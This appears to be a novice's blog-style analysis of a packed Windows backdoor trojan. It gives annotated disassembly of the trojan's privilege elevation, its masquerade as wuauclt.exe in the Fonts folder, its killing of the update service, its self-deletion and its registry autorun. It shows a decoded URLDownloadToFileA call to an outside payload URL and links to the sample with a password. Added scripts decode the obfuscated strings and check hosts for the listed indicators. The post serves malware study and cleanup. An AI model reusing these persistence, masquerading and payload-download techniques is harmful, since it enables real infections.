A simple analysis of a backdoor trojan
A newbie's first analysis; pointers from the experts are welcome.
Download link: http://www.cnblogs.com/Joy7/admin/Files.aspx   File name: 原样本 (original sample)   Extraction password: JoyChou
Virus description:
After the sample runs, the virus first elevates its own privileges.
It creates a directory named sa.exe under the Windows root and sets that directory's attributes to hidden and read-only.
It then invokes cmd and taskkill to terminate the wuauclt.exe process (wuauclt.exe is the Windows Automatic Updates client; it keeps checking online for updates, so killing it stops the computer from receiving the latest update information).
Next it checks whether its own process was started from C:\WINDOWS\Fonts\wuauclt.exe.
If not, it copies the original sample into C:\WINDOWS\Fonts and renames it wuauclt.exe (masquerading as the Windows Automatic Updates client).
If so, it loads the system library urlmon.dll, calls its URLDownloadToFileA function, downloads a virus file from the network and saves it as C:\WINDOWS\Fonts\gern.fon,
then checks whether that file exists: if not, it pops up a message box and exits; if it does, it creates several threads and adds a registry autorun entry.
Behaviour analysis:
1. After the virus runs, it drops the following files:
C:\WINDOWS\Fonts\wuauclt.exe
C:\WINDOWS\Fonts\gern.fon
2. Registry modification
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer\run\360safe
Value: string: "C:\WINDOWS\Fonts\wuauclt.exe"
Description: adds a virus autorun entry
3. Uses the command line "cmd /c taskkill /im wuauclt.exe /f" to kill the wuauclt.exe Windows Automatic Updates process. Once started, the virus checks whether its own process path is under "\fonts\wuauclt.exe"; if not, it re-creates itself there; if so, it loads the system library urlmon.dll and calls its URLDownloadToFileA function to connect to http://360.1s.fr/ps.jpg, download the virus file and save it as "C:\WINDOWS\Fonts\gern.fon" in the font directory.
4. Checks whether C:\WINDOWS\Fonts\gern.fon exists; if not, it shows a message box titled "http" with the body "qq935623508" and then exits; if it does, it modifies the registry and adds a boot-time autorun entry.
Detailed analysis:
First: the virus is packed with UPX; the ESP trick unpacks it (I hadn't unpacked anything in ages and almost forgot how, =_=).
Elevating the virus's own privileges
0040214D E8 7EF4FFFF    call unpack.004015D0                                    ; // press F7 to step in; the callee follows
004015D3 FF15 54304000  call dword ptr ds:[<&kernel32.GetCurrentProcess>]       ; get the current (virus) process
004015D9 8D4C24 00      lea ecx,dword ptr ss:[esp]
004015DD 51             push ecx
004015DE 6A 28          push 0x28
004015E0 50             push eax                                                ; the returned process pseudo-handle
004015E1 FF15 10304000  call dword ptr ds:[<&advapi32.OpenProcessToken>]        ; advapi32.OpenProcessToken
004015E7 85C0           test eax,eax
004015E9 74 49          je short unpack.00401634
004015EB 8D5424 08      lea edx,dword ptr ss:[esp+0x8]
004015EF 52             push edx
004015F0 68 E47C4000    push unpack.00407CE4                                    ; ASCII "SeDebugPrivilege"
004015F5 6A 00          push 0x0
004015F7 FF15 14304000  call dword ptr ds:[<&advapi32.LookupPrivilegeValueA>>   ; advapi32.LookupPrivilegeValueA
004015FD 85C0           test eax,eax
004015FF 74 28          je short unpack.00401629
00401601 8B4C24 00      mov ecx,dword ptr ss:[esp]                              ; unpack.00402152
00401605 6A 00          push 0x0
00401607 6A 00          push 0x0
00401609 8D4424 0C      lea eax,dword ptr ss:[esp+0xC]
0040160D 6A 00          push 0x0
0040160F 50             push eax
00401610 6A 00          push 0x0
00401612 51             push ecx
00401613 C74424 1C 01000>mov dword ptr ss:[esp+0x1C],0x1
0040161B C74424 28 02000>mov dword ptr ss:[esp+0x28],0x2
00401623 FF15 18304000  call dword ptr ds:[<&advapi32.AdjustTokenPrivileges>>   ; advapi32.AdjustTokenPrivileges
00401629 8B5424 00      mov edx,dword ptr ss:[esp]                              ; unpack.00402152
0040162D 52             push edx
0040162E FF15 A0304000  call dword ptr ds:[<&kernel32.CloseHandle>]             ; kernel32.CloseHandle
00401634 83C4 14        add esp,0x14
00401637 C3             retn

// Checking whether the virus's own process path is under "\fonts\wuauclt.exe"
00402172 FF15 7C304000  call dword ptr ds:[<&kernel32.GetWindows>               ; get the Windows directory, i.e. C:\WINDOWS
00402178 BF 047D4000    mov edi,unpack.00407D04                                 ; ASCII "\Fonts\wuauclt.exe"
0040217D 83C9 FF        or ecx,-0x1
00402180 33C0           xor eax,eax
00402182 8D95 5CFEFFFF  lea edx,dword ptr ss:[ebp-0x1A4]
00402188 F2:AE          repne scas byte ptr es:[edi]
0040218A F7D1           not ecx
0040218C 2BF9           sub edi,ecx
0040218E 68 687F4000    push unpack.00407F68                                    ; "ont", i.e. the "ont" in "font", used for the comparison
00402193 8BF7           mov esi,edi                                             ; ntdll.7C930228
00402195 8BD9           mov ebx,ecx
00402197 8BFA           mov edi,edx                                             ; ntdll.KiFastSystemCallRet
00402199 83C9 FF        or ecx,-0x1
0040219C F2:AE          repne scas byte ptr es:[edi]
0040219E 8BCB           mov ecx,ebx
004021A0 4F             dec edi                                                 ; ntdll.7C930228
004021A1 C1E9 02        shr ecx,0x2
004021A4 F3:A5          rep movs dword ptr es:[edi],dword ptr ds>
004021A6 8BCB           mov ecx,ebx
004021A8 8D85 54FCFFFF  lea eax,dword ptr ss:[ebp-0x3AC]
004021AE 83E1 03        and ecx,0x3
004021B1 50             push eax
004021B2 F3:A4          rep movs byte ptr es:[edi],byte ptr ds:[>
004021B4 E8 27030000    call unpack.004024E0                                    ; check whether its own process path is C:\WINDOWS\Fonts\wuauclt.exe
004021B9 83C4 08        add esp,0x8
004021BC 85C0           test eax,eax
004021BE 0F84 DA010000  je unpack.0040239E                                      ; jump if it is not

If it was not started from C:\WINDOWS\Fonts\wuauclt.exe, jump here and re-create itself
0040239E 68 307F4000    push unpack.00407F30                                    ; path C:\sa.exe
004023A3 E8 4E020000    call unpack.004025F6                                    ; create the C:\sa.exe directory
004023A8 8B35 88304000  mov esi,dword ptr ds:[<&kernel32.Sleep>]                ; kernel32.Sleep
004023AE 83C4 04        add esp,0x4
004023B1 6A 64          push 0x64
004023B3 FFD6           call esi
004023B5 6A 03          push 0x3                                                ; attributes: READONLY|HIDDEN
004023B7 68 307F4000    push unpack.00407F30                                    ; ASCII "C:\sa.exe"
004023BC FF15 9C304000  call dword ptr ds:[<&kernel32.SetFileAtt>               ; set the folder attribute to hidden
004023C2 8B1D 28304000  mov ebx,dword ptr ds:[<&kernel32.WinExec>               ; kernel32.WinExec
004023C8 6A 00          push 0x0
004023CA 68 0C7F4000    push unpack.00407F0C                                    ; ASCII "cmd /c taskkill /im wuauclt.exe /f"
004023CF FFD3           call ebx                                                ; call cmd and taskkill to kill the wuauclt.exe process
004023D1 68 D0070000    push 0x7D0
004023D6 FFD6           call esi
004023D8 8D8D 5CFEFFFF  lea ecx,dword ptr ss:[ebp-0x1A4]
004023DE 6A 00          push 0x0                                                ; check whether the virus process comes from C:\WINDOWS\Fonts\wuauclt.exe
004023E0 8D95 54FCFFFF  lea edx,dword ptr ss:[ebp-0x3AC]
004023E6 51             push ecx                                                ; destination of the copy: C:\WINDOWS\Fonts\wuauclt.exe
004023E7 52             push edx                                                ; the original virus file
004023E8 FF15 50304000  call dword ptr ds:[<&kernel32.CopyFileA>>               ; copy the original virus file to C:\WINDOWS\Fonts\wuauclt.exe
004023EE 68 A00F0000    push 0xFA0
004023F3 FFD6           call esi
004023F5 8D85 5CFEFFFF  lea eax,dword ptr ss:[ebp-0x1A4]
004023FB 6A 00          push 0x0
004023FD 50             push eax
004023FE FFD3           call ebx                                                ; run wuauclt.exe
00402400 B9 18000000    mov ecx,0x18
00402405 33C0           xor eax,eax
00402407 8DBD 61FFFFFF  lea edi,dword ptr ss:[ebp-0x9F]
0040240D C685 60FFFFFF 0>mov byte ptr ss:[ebp-0xA0],0x0
00402414 F3:AB          rep stos dword ptr es:[edi]
00402416 66:AB          stos word ptr es:[edi]
00402418 AA             stos byte ptr es:[edi]
00402419 BF 007F4000    mov edi,unpack.00407F00                                 ; ASCII "cmd /c del "
0040241E 83C9 FF        or ecx,-0x1
00402421 33C0           xor eax,eax
00402423 8D95 60FFFFFF  lea edx,dword ptr ss:[ebp-0xA0]
00402429 F2:AE          repne scas byte ptr es:[edi]
0040242B F7D1           not ecx
0040242D 2BF9           sub edi,ecx
0040242F 8BC1           mov eax,ecx
00402431 8BF7           mov esi,edi                                             ; ntdll.7C930228
00402433 8BFA           mov edi,edx                                             ; ntdll.KiFastSystemCallRet
00402435 C1E9 02        shr ecx,0x2
00402438 F3:A5          rep movs dword ptr es:[edi],dword ptr ds>
0040243A 8BC8           mov ecx,eax
0040243C 83E1 03        and ecx,0x3
0040243F F3:A4          rep movs byte ptr es:[edi],byte ptr ds:[>
00402441 FF15 4C304000  call dword ptr ds:[<&kernel32.GetCommand>               ; kernel32.GetCommandLineA
00402447 8BF8           mov edi,eax
00402449 83C9 FF        or ecx,-0x1
0040244C 33C0           xor eax,eax
0040244E 8D95 60FFFFFF  lea edx,dword ptr ss:[ebp-0xA0]
00402454 F2:AE          repne scas byte ptr es:[edi]
00402456 F7D1           not ecx
00402458 2BF9           sub edi,ecx
0040245A 50             push eax
0040245B 8BF7           mov esi,edi                                             ; ntdll.7C930228
0040245D 8BFA           mov edi,edx                                             ; ntdll.KiFastSystemCallRet
0040245F 8BD1           mov edx,ecx
00402461 83C9 FF        or ecx,-0x1
00402464 F2:AE          repne scas byte ptr es:[edi]
00402466 8BCA           mov ecx,edx                                             ; ntdll.KiFastSystemCallRet
00402468 4F             dec edi                                                 ; ntdll.7C930228
00402469 C1E9 02        shr ecx,0x2
0040246C F3:A5          rep movs dword ptr es:[edi],dword ptr ds>
0040246E 8BCA           mov ecx,edx                                             ; ntdll.KiFastSystemCallRet
00402470 8D85 60FFFFFF  lea eax,dword ptr ss:[ebp-0xA0]
00402476 83E1 03        and ecx,0x3
00402479 50             push eax                                                ; cmd /c del "<path of the original sample>"
0040247A F3:A4          rep movs byte ptr es:[edi],byte ptr ds:[>
0040247C FFD3           call ebx                                                ; call cmd to delete itself

If it was started from C:\WINDOWS\Fonts\wuauclt.exe, modify the registry and create multiple threads
004021C4 33C9           xor ecx,ecx
004021C6 8D55 EC        lea edx,dword ptr ss:[ebp-0x14]
004021C9 894D ED        mov dword ptr ss:[ebp-0x13],ecx
004021CC 52             push edx
004021CD 894D F1        mov dword ptr ss:[ebp-0xF],ecx
004021D0 68 B87D4000    push unpack.00407DB8                                    ; ASCII "khbced$Zbb"
004021D5 894D F5        mov dword ptr ss:[ebp-0xB],ecx
004021D8 C645 EC 00     mov byte ptr ss:[ebp-0x14],0x0
004021DC 894D F9        mov dword ptr ss:[ebp-0x7],ecx
004021DF 66:894D FD     mov word ptr ss:[ebp-0x3],cx
004021E3 884D FF        mov byte ptr ss:[ebp-0x1],cl
004021E6 E8 25F1FFFF    call unpack.00401310                                    ; decode "urlmon.dll" (each character of khbced$Zbb + 0xA)
004021EB 83C4 08        add esp,0x8
004021EE 90             nop                                                     ; // many nops omitted
00402216 8D45 EC        lea eax,dword ptr ss:[ebp-0x14]
00402219 50             push eax
0040221A FF15 38304000  call dword ptr ds:[<&kernel32.LoadLibraryA>]            ; load urlmon.dll
00402220 8BD8           mov ebx,eax
00402222 B9 09000000    mov ecx,0x9
00402227 33C0           xor eax,eax
00402229 8D7D C5        lea edi,dword ptr ss:[ebp-0x3B]
0040222C C645 C4 00     mov byte ptr ss:[ebp-0x3C],0x0
00402230 C685 60FFFFFF 0>mov byte ptr ss:[ebp-0xA0],0x0
00402237 F3:AB          rep stos dword ptr es:[edi]
00402239 66:AB          stos word ptr es:[edi]
0040223B AA             stos byte ptr es:[edi]
0040223C B9 18000000    mov ecx,0x18
00402241 33C0           xor eax,eax
00402243 8DBD 61FFFFFF  lea edi,dword ptr ss:[ebp-0x9F]
00402249 F3:AB          rep stos dword ptr es:[edi]
0040224B 66:AB          stos word ptr es:[edi]
0040224D 8D4D C4        lea ecx,dword ptr ss:[ebp-0x3C]
00402250 51             push ecx
00402251 68 A47D4000    push unpack.00407DA4                                    ; ASCII "KHB:emdbeWZJe<_b[7"
00402256 AA             stos byte ptr es:[edi]
00402257 E8 B4F0FFFF    call unpack.00401310                                    ; decode the "URLDownloadToFileA" string
0040225C 83C4 08        add esp,0x8
0040225F 8D55 C4        lea edx,dword ptr ss:[ebp-0x3C]
00402262 52             push edx
00402263 53             push ebx
00402264 FF15 34304000  call dword ptr ds:[<&kernel32.GetProcAddress>]          ; get the address of URLDownloadToFileA in urlmon.dll
0040226A A3 D88C4000    mov dword ptr ds:[0x408CD8],eax                         ; store the address in the global at 0x408CD8
0040226F 8D85 58FDFFFF  lea eax,dword ptr ss:[ebp-0x2A8]
00402275 68 04010000    push 0x104
0040227A 50             push eax
0040227B FF15 7C304000  call dword ptr ds:[<&kernel32.GetWindowsDirect>         ; kernel32.GetWindowsDirectoryA
00402281 BF D47C4000    mov edi,unpack.00407CD4                                 ; ASCII "\Fonts\gern.fon"
00402286 83C9 FF        or ecx,-0x1
00402289 33C0           xor eax,eax
0040228B 8D95 58FDFFFF  lea edx,dword ptr ss:[ebp-0x2A8]
00402291 F2:AE          repne scas byte ptr es:[edi]
00402293 F7D1           not ecx
00402295 2BF9           sub edi,ecx
00402297 8BF7           mov esi,edi
00402299 8BFA           mov edi,edx
0040229B 8BD1           mov edx,ecx
0040229D 83C9 FF        or ecx,-0x1
004022A0 F2:AE          repne scas byte ptr es:[edi]
004022A2 8BCA           mov ecx,edx
004022A4 4F             dec edi
004022A5 C1E9 02        shr ecx,0x2
004022A8 F3:A5          rep movs dword ptr es:[edi],dword ptr ds:[esi]
004022AA 8BCA           mov ecx,edx
004022AC 8D85 60FFFFFF  lea eax,dword ptr ss:[ebp-0xA0]
004022B2 83E1 03        and ecx,0x3
004022B5 50             push eax
004022B6 F3:A4          rep movs byte ptr es:[edi],byte ptr ds:[esi]
004022B8 68 507F4000    push unpack.00407F50                                    ; ASCII "^jjf0%%),&$'i$\h%fi$`f]"
004022BD E8 4EF0FFFF    call unpack.00401310                                    ; decode the "http://360.1s.fr/ps.jpg" string
004022C2 83C4 08        add esp,0x8
004022C5 8D8D 58FDFFFF  lea ecx,dword ptr ss:[ebp-0x2A8]                        ; C:\WINDOWS\Fonts\gern.fon
004022CB 8D95 60FFFFFF  lea edx,dword ptr ss:[ebp-0xA0]                         ; http://360.1s.fr/ps.jpg
004022D1 6A 00          push 0x0
004022D3 6A 00          push 0x0
004022D5 51             push ecx                                                ; file name to save the download as
004022D6 52             push edx                                                ; URL to download
004022D7 6A 00          push 0x0
004022D9 FF15 D88C4000  call dword ptr ds:[0x408CD8]                            ; call URLDownloadToFileA; this virus is old, though, and the link is dead by now
004022DF 68 10270000    push 0x2710
004022E4 FF15 88304000  call dword ptr ds:[<&kernel32.Sleep>]                   ; kernel32.Sleep
004022EA 53             push ebx
004022EB FF15 30304000  call dword ptr ds:[<&kernel32.FreeLibrary>]             ; free urlmon.dll
004022F1 8D85 58FDFFFF  lea eax,dword ptr ss:[ebp-0x2A8]
004022F7 50             push eax
004022F8 FF15 2C304000  call dword ptr ds:[<&kernel32.GetFileAttribute>         ; get the attributes of C:\WINDOWS\Fonts\gern.fon
004022FE 83F8 FF        cmp eax,-0x1                                            ; check whether C:\WINDOWS\Fonts\gern.fon exists
00402301 6A 00          push 0x0
00402303 75 1E          jnz short unpack.00402323                               ; jump if it exists
00402305 68 487F4000    push unpack.00407F48                                    ; ASCII "http"
0040230A 68 3C7F4000    push unpack.00407F3C                                    ; ASCII "qq935623508"
0040230F 6A FF          push -0x1
00402311 FF15 B0304000  call dword ptr ds:[<&user32.MessageBoxA>]               ; user32.MessageBoxA

In C:\WINDOWS\Fonts you cannot right-click to create a new item, so I used cmd commands: cd C:\WINDOWS\Fonts; md gern.fon; cd gern.fon. That created it, although it still does not show up in the Fonts folder; a Ctrl+F search there finds the folder~~

Creating multiple threads
00402323 8B35 58304000  mov esi,dword ptr ds:[<&kernel32.CreateThread>]         ; kernel32.CreateThread
00402329 6A 00          push 0x0
0040232B 6A 00          push 0x0
0040232D 68 801F4000    push unpack.00401F80
00402332 6A 00          push 0x0
00402334 6A 00          push 0x0
00402336 FFD6           call esi                                                ; kernel32.CreateThread
00402338 6A 00          push 0x0
0040233A 6A 00          push 0x0
0040233C 6A 00          push 0x0
0040233E 68 301C4000    push unpack.00401C30
00402343 6A 00          push 0x0
00402345 6A 00          push 0x0
00402347 FFD6           call esi                                                ; kernel32.CreateThread
00402349 6A 00          push 0x0
0040234B 6A 00          push 0x0
0040234D 6A 00          push 0x0
0040234F 68 F0194000    push unpack.004019F0
00402354 6A 00          push 0x0
00402356 6A 00          push 0x0
00402358 FFD6           call esi                                                ; kernel32.CreateThread
0040235A 6A 00          push 0x0
0040235C 6A 00          push 0x0
0040235E 6A 00          push 0x0
00402360 68 40164000    push unpack.00401640
00402365 6A 00          push 0x0
00402367 6A 00          push 0x0
00402369 FFD6           call esi                                                ; kernel32.CreateThread
0040236B 6A 00          push 0x0
0040236D 6A 00          push 0x0
0040236F 6A 00          push 0x0
00402371 68 50174000    push unpack.00401750
00402376 6A 00          push 0x0
00402378 6A 00          push 0x0
0040237A FFD6           call esi                                                ; kernel32.CreateThread
0040237C 6A 00          push 0x0
0040237E 6A 00          push 0x0
00402380 6A 00          push 0x0
00402382 68 701D4000    push unpack.00401D70
00402387 6A 00          push 0x0
00402389 6A 00          push 0x0
0040238B FFD6           call esi                                                ; kernel32.CreateThread
0040238D E8 CEF2FFFF    call unpack.00401660                                    ; add the virus autorun entry
00402392 5F             pop edi                                                 ; ntdll.7C930228
00402393 5E             pop esi                                                 ; ntdll.7C930228
00402394 B8 01000000    mov eax,0x1
00402399 5B             pop ebx                                                 ; ntdll.7C930228
0040239A 8BE5           mov esp,ebp
0040239C 5D             pop ebp                                                 ; ntdll.7C930228
0040239D C3             retn

Adding the virus autorun entry
00401660 81EC 08010000  sub esp,0x108
00401666 8D4424 00      lea eax,dword ptr ss:[esp]
0040166A 50             push eax
0040166B 68 247D4000    push unpack.00407D24                                    ; ASCII "Software\Microsoft\Windows\CurrentVersion\policies"
00401670 68 02000080    push 0x80000002
00401675 FF15 20304000  call dword ptr ds:[<&advapi32.RegOpenKeyA>]             ; advapi32.RegOpenKeyA
0040167B 85C0           test eax,eax
0040167D 0F85 B7000000  jnz unpack.0040173A
00401683 8B5424 00      mov edx,dword ptr ss:[esp]                              ; unpack.00402392
00401687 53             push ebx                                                ; urlmon.78130000
00401688 8B1D 04304000  mov ebx,dword ptr ds:[<&advapi32.RegCreateKeyA>]        ; open the registry key Software\Microsoft\Windows\CurrentVersion\policies\explorer
0040168E 55             push ebp
0040168F 56             push esi                                                ; kernel32.CreateThread
00401690 8D4C24 0C      lea ecx,dword ptr ss:[esp+0xC]
00401694 57             push edi
00401695 51             push ecx                                                ; kernel32.7C8106A3
00401696 68 187D4000    push unpack.00407D18                                    ; ASCII "explorer"
0040169B 52             push edx                                                ; ntdll.KiFastSystemCallRet
0040169C FFD3           call ebx                                                ; urlmon.78130000
0040169E 8B2D 08304000  mov ebp,dword ptr ds:[<&advapi32.RegCloseKey>]          ; advapi32.RegCloseKey
004016A4 85C0           test eax,eax
004016A6 74 07          je short unpack.004016AF
004016A8 8B4424 10      mov eax,dword ptr ss:[esp+0x10]
004016AC 50             push eax
004016AD FFD5           call ebp
004016AF 8D4C24 14      lea ecx,dword ptr ss:[esp+0x14]
004016B3 68 04010000    push 0x104
004016B8 51             push ecx                                                ; kernel32.7C8106A3
004016B9 FF15 7C304000  call dword ptr ds:[<&kernel32.GetWindowsDirectoryA>]    ; kernel32.GetWindowsDirectoryA
004016BF BF 047D4000    mov edi,unpack.00407D04                                 ; ASCII "\Fonts\wuauclt.exe"
004016C4 83C9 FF        or ecx,-0x1
004016C7 33C0           xor eax,eax
004016C9 8D5424 14      lea edx,dword ptr ss:[esp+0x14]
004016CD F2:AE          repne scas byte ptr es:[edi]
004016CF F7D1           not ecx                                                 ; kernel32.7C8106A3
004016D1 2BF9           sub edi,ecx                                             ; kernel32.7C8106A3
004016D3 8BF7           mov esi,edi
004016D5 8BFA           mov edi,edx                                             ; ntdll.KiFastSystemCallRet
004016D7 8BD1           mov edx,ecx                                             ; kernel32.7C8106A3
004016D9 83C9 FF        or ecx,-0x1
004016DC F2:AE          repne scas byte ptr es:[edi]
004016DE 8BCA           mov ecx,edx                                             ; ntdll.KiFastSystemCallRet
004016E0 4F             dec edi
004016E1 C1E9 02        shr ecx,0x2
004016E4 F3:A5          rep movs dword ptr es:[edi],dword ptr ds:[esi]
004016E6 8BCA           mov ecx,edx                                             ; ntdll.KiFastSystemCallRet
004016E8 8D4424 10      lea eax,dword ptr ss:[esp+0x10]
004016EC 83E1 03        and ecx,0x3
004016EF 50             push eax
004016F0 F3:A4          rep movs byte ptr es:[edi],byte ptr ds:[esi]
004016F2 8B4C24 14      mov ecx,dword ptr ss:[esp+0x14]
004016F6 68 007D4000    push unpack.00407D00                                    ; ASCII "run"
004016FB 51             push ecx                                                ; kernel32.7C8106A3
004016FC FFD3           call ebx                                                ; create the registry key Software\Microsoft\Windows\CurrentVersion\policies\run
004016FE 8D7C24 14      lea edi,dword ptr ss:[esp+0x14]
00401702 83C9 FF        or ecx,-0x1
00401705 33C0           xor eax,eax
00401707 8D5424 14      lea edx,dword ptr ss:[esp+0x14]
0040170B F2:AE          repne scas byte ptr es:[edi]
0040170D F7D1           not ecx                                                 ; kernel32.7C8106A3
0040170F 51             push ecx                                                ; kernel32.7C8106A3
00401710 52             push edx                                                ; ntdll.KiFastSystemCallRet
00401711 6A 01          push 0x1
00401713 50             push eax
00401714 8B4424 20      mov eax,dword ptr ss:[esp+0x20]
00401718 68 F87C4000    push unpack.00407CF8                                    ; new value named 360safe
0040171D 50             push eax                                                ; data: C:\WINDOWS\Fonts\wuauclt.exe
0040171E FF15 0C304000  call dword ptr ds:[<&advapi32.RegSetValueExA>]          ; add the virus autorun entry
00401724 85C0           test eax,eax
00401726 74 07          je short unpack.0040172F
00401728 8B4C24 10      mov ecx,dword ptr ss:[esp+0x10]
0040172C 51             push ecx                                                ; kernel32.7C8106A3
0040172D FFD5           call ebp
0040172F 8B5424 10      mov edx,dword ptr ss:[esp+0x10]
00401733 52             push edx                                                ; ntdll.KiFastSystemCallRet
00401734 FFD5           call ebp
00401736 5F             pop edi                                                 ; unpack.00402392
00401737 5E             pop esi                                                 ; unpack.00402392
00401738 5D             pop ebp                                                 ; unpack.00402392
00401739 5B             pop ebx                                                 ; unpack.00402392
0040173A 81C4 08010000  add esp,0x108
00401740 C3             retn
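The three calls to 00401310 above each turn an unreadable string from the data section into a plaintext the post names: "khbced$Zbb" becomes "urlmon.dll", "KHB:emdbeWZJe<_b[7" becomes "URLDownloadToFileA", and "^jjf0%%),&$'i$\h%fi$`f]" becomes the download URL, in every case by adding 0xA to each byte. The script below is an added example written for this page, not code from the post or from the sample; it reproduces that transform so the decoded values can be confirmed statically, and it generalises the idea into a "strings after decoding" scan over an arbitrary blob (the blob here is a constructed stand-in for the data section, and the printable-run heuristic is my own, not something the post describes).

```python
"""Recover the strings the sample obfuscates (added example; not code from the post).

The routine at 00401310 adds 0xA to every byte of its input. The same shift is
applied here to the three obfuscated strings copied from the listing, and then
to a whole blob of data so that runs of bytes which only become printable
after the shift stand out, the way `strings` output would after decoding.
"""

SHIFT = 0x0A  # the constant the post observed: every byte + 0xA

# The obfuscated strings exactly as they appear in the listing, keyed by the
# address each `push` instruction references.
OBFUSCATED = {
    0x00407DB8: b"khbced$Zbb",                 # decoded by the call at 004021E6
    0x00407DA4: b"KHB:emdbeWZJe<_b[7",         # decoded by the call at 00402257
    0x00407F50: b"^jjf0%%),&$'i$\\h%fi$`f]",   # decoded by the call at 004022BD
}


def decode(blob: bytes, shift: int = SHIFT) -> str:
    """Apply the sample's transform: (byte + shift) mod 256, viewed as 8-bit text."""
    return bytes((b + shift) & 0xFF for b in blob).decode("latin-1")


def encode(text: str, shift: int = SHIFT) -> bytes:
    """Inverse transform; lets you check that a guessed plaintext round-trips."""
    return bytes((b - shift) & 0xFF for b in text.encode("latin-1"))


def decode_all(table=OBFUSCATED) -> dict:
    """Decode every entry, keyed by its address in the unpacked binary."""
    return {addr: decode(s) for addr, s in table.items()}


def scan_blob(data: bytes, shift: int = SHIFT, min_len: int = 6) -> list:
    """Shift every byte, then return runs of printable ASCII at least min_len long.

    The NUL terminators between strings are not printable before or after the
    shift, so they break the runs exactly as they separate the strings in the
    binary's data section.
    """
    shifted = bytes((b + shift) & 0xFF for b in data)
    found, run = [], bytearray()
    for b in shifted + b"\x00":  # trailing sentinel flushes the final run
        if 0x20 <= b < 0x7F:
            run.append(b)
        else:
            if len(run) >= min_len:
                found.append(run.decode("ascii"))
            run = bytearray()
    return found


# Constructed stand-in for the .data section: the three obfuscated strings,
# NUL-separated, with a few unrelated bytes around them.
SAMPLE_BLOB = b"\x00\x00" + b"\x00".join(OBFUSCATED.values()) + b"\x00\xff\x01"


if __name__ == "__main__":
    for addr, plain in decode_all().items():
        print(f"{addr:08X}: {plain}")
    print(scan_blob(SAMPLE_BLOB))
```

Because the transform is a fixed additive shift, `encode` gives the obfuscated form back from a plaintext; that is a quick way to confirm a guessed string (for instance, that a second variant hides the same DLL name) without stepping through the decoding routine in a debugger.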
Cleanup:
First run a scan with 360 antivirus.
It doesn't seem to help much.
Forcibly delete the virus files:
C:\WINDOWS\Fonts\gern.fon
C:\WINDOWS\Fonts\wuauclt.exe
C:\WINDOWS\sa.exe
Delete the registry entry:
HKLM\Software\Microsoft\Windows\CurrentVersion\policies\run\360safe
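The cleanup steps above amount to a small indicator list: three paths and one autorun value. The script below is an added example (mine, not the post's) that checks a host against exactly those indicators offline: it parses the text that `reg export` writes for the policies key and a plain list of file paths, both constructed inline here, reports which indicators are present, and prints the cmd.exe commands that carry out the removal. The shape of the .reg text is assumed from the standard "Windows Registry Editor Version 5.00" format; the key path used for the autorun value is the `policies\explorer\run` path the behaviour analysis gives, and both spellings of the sa.exe directory that appear on the page are included.

```python
"""Triage check for the indicators this post lists (added example; not the post's code).

Parses a 'reg export' dump and a file listing (both constructed here) and
reports which of the post's indicators are present, plus the removal commands.
"""
import re

# Indicators copied from the post. The listing shows the directory as C:\sa.exe
# while the cleanup section writes C:\WINDOWS\sa.exe; both are kept. Kinds follow
# the post: sa.exe is a directory, the two Fonts entries are files.
IOC_PATHS = {
    r"C:\WINDOWS\Fonts\gern.fon": "file",
    r"C:\WINDOWS\Fonts\wuauclt.exe": "file",
    r"C:\sa.exe": "dir",
    r"C:\WINDOWS\sa.exe": "dir",
}
IOC_RUN_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer\run"
IOC_RUN_VALUE = "360safe"

# Constructed sample of a .reg export (assumed to follow the regedit 5.00 format).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer]
"NoDriveTypeAutoRun"=dword:00000091

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer\run]
"360safe"="C:\\WINDOWS\\Fonts\\wuauclt.exe"
'''

# Constructed directory listing of the host (what 'dir /s /b' would give).
SAMPLE_FILES = [
    r"C:\WINDOWS\Fonts\arial.ttf",
    r"C:\WINDOWS\Fonts\gern.fon",
    r"C:\WINDOWS\Fonts\wuauclt.exe",
    r"C:\WINDOWS\system32\wuauclt.exe",  # the legitimate client; not an indicator
    r"C:\sa.exe",
]

_VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')


def parse_reg_export(text: str) -> dict:
    """Return {key_path: {value_name: data}}; REG_SZ data is unescaped, others kept raw."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None:
            m = _VALUE_RE.match(line)
            if not m:
                continue
            name, data = m.groups()
            if data.startswith('"') and data.endswith('"'):  # quoted string data
                data = re.sub(r"\\(.)", r"\1", data[1:-1])   # undo \\ and \" escapes
            keys[current][name] = data
    return keys


def check_host(reg_text: str, file_paths) -> dict:
    """Match the post's indicators (case-insensitively, as Windows does) against the inputs."""
    reg = {k.lower(): v for k, v in parse_reg_export(reg_text).items()}
    run_values = reg.get(IOC_RUN_KEY.lower(), {})
    persistence = next((d for n, d in run_values.items()
                        if n.lower() == IOC_RUN_VALUE.lower()), None)
    known = {p.lower(): kind for p, kind in IOC_PATHS.items()}
    hits = sorted((p, known[p.lower()]) for p in file_paths if p.lower() in known)
    return {"persistence": persistence, "paths": hits}


def cleanup_plan(result: dict) -> list:
    """Turn findings into the cmd.exe commands the post's cleanup section implies."""
    cmds = []
    if result["persistence"] is not None:
        hklm_key = "HKLM" + IOC_RUN_KEY[len("HKEY_LOCAL_MACHINE"):]
        cmds.append(f'reg delete "{hklm_key}" /v {IOC_RUN_VALUE} /f')
    for path, kind in result["paths"]:
        cmds.append(f'attrib -r -h "{path}"')  # the post says these are set hidden/read-only
        cmds.append(f'rd /s /q "{path}"' if kind == "dir" else f'del /f /q "{path}"')
    return cmds


if __name__ == "__main__":
    findings = check_host(SAMPLE_REG, SAMPLE_FILES)
    print(findings)
    print("\n".join(cleanup_plan(findings)))
```

On a real machine the two inputs come from `reg export "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies" policies.reg` and `dir C:\ /s /b /a`, the latter with `/a` so that the hidden directory the sample creates is listed at all.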
PS: For my first analysis I picked a backdoor trojan. I'm clearly very green and inexperienced, and there is a lot I still haven't finished analysing. I should use IDA more in future; analysing in OD is too slow. I hope the experts can give me some pointers; I'm still learning.